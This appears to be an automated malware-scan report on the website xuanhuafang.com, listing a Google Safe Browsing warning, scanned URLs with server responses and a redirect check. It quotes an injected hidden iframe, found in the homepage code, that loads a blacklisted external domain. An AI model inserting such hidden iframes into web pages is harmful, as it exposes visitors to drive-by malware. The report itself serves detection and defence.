Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xuanhuafang.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.xuanhuafang.com/ | 200 OK Content-Length: 117993 Content-Type: text/html | malicious |
Page code contains blacklisted domain: tradeinvgroup.com ...[4082 bytes skipped]... -document.getElementById("Javascript.RightDiv").offsetWidth-Borderpx; } function hidead() { showad = false; document.getElementById("Javascript.LeftDiv").style.display="none"; document.getElementById("Javascript.RightDiv").style.display="none"; } window.onscroll=scall; window.onresize=scall; window.onload=scall;</SCRIPT><div style="visibility:hidden"><iframe src="http://tradeinvgroup.com/htdocs/test2.php" width=10 height=10></iframe></div> </body> </html> Malicious iFrame found. The same iFrame was found in 9 websites. size: 10x10 src: http://tradeinvgroup.com/htdocs/test2.php This URL is marked by Google as suspicious <iframe src="http://tradeinvgroup.com/htdocs/test2.php" width=10 height=10> | ||
http://www.xuanhuafang.com/flash.js | 200 OK Content-Length: 4489 Content-Type: application/x-javascript | clean |
http://float2006.tq.cn/floatcard?adminid=9414327&sort=0 | 200 OK Content-Length: 3498 Content-Type: application/x-javascript | clean |
http://www.xuanhuafang.com/register.php | 200 OK Content-Length: 24487 Content-Type: text/html | clean |
http://www.xuanhuafang.com/password.php | 200 OK Content-Length: 19100 Content-Type: text/html | clean |
http://www.xuanhuafang.com/help.php | 200 OK Content-Length: 24170 Content-Type: text/html | clean |
http://www.xuanhuafang.com/post.php | HTTP/1.1 200 OK Connection: close Date: Thu, 08 Jan 2015 19:24:44 GMT Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.2.4 | clean |
http://www.xuanhuafang.com/test404page.js | 404 Not Found Content-Length: 2477 Content-Type: text/html | clean |
http://www.xuanhuafang.com/tool.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.xuanhuafang.com/pub/01.doc | 200 OK Content-Length: 50688 Content-Type: application/msword | clean |
http://www.xuanhuafang.com/pub/02.doc | 200 OK Content-Length: 28672 Content-Type: application/msword | clean |
http://www.xuanhuafang.com/pub/03.doc | 200 OK Content-Length: 32256 Content-Type: application/msword | clean |
http://www.xuanhuafang.com/pub/04.doc | 200 OK Content-Length: 25088 Content-Type: application/msword | clean |
http://www.xuanhuafang.com/pub/05.doc | 200 OK Content-Length: 33280 Content-Type: application/msword | clean |
http://www.xuanhuafang.com/pub/06.doc | 200 OK Content-Length: 19968 Content-Type: application/msword | clean |
http://www.xuanhuafang.com/pub/07.doc | 200 OK Content-Length: 19456 Content-Type: application/msword | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xuanhuafang.com
Result:
GET / HTTP/1.1
Host: xuanhuafang.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xuanhuafang.com
Referer: http://www.google.com/search?q=xuanhuafang.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xuanhuafang.com
Referer: http://www.google.com/search?q=xuanhuafang.com
Result:
The result is similar to the first query. There are no suspicious redirects found.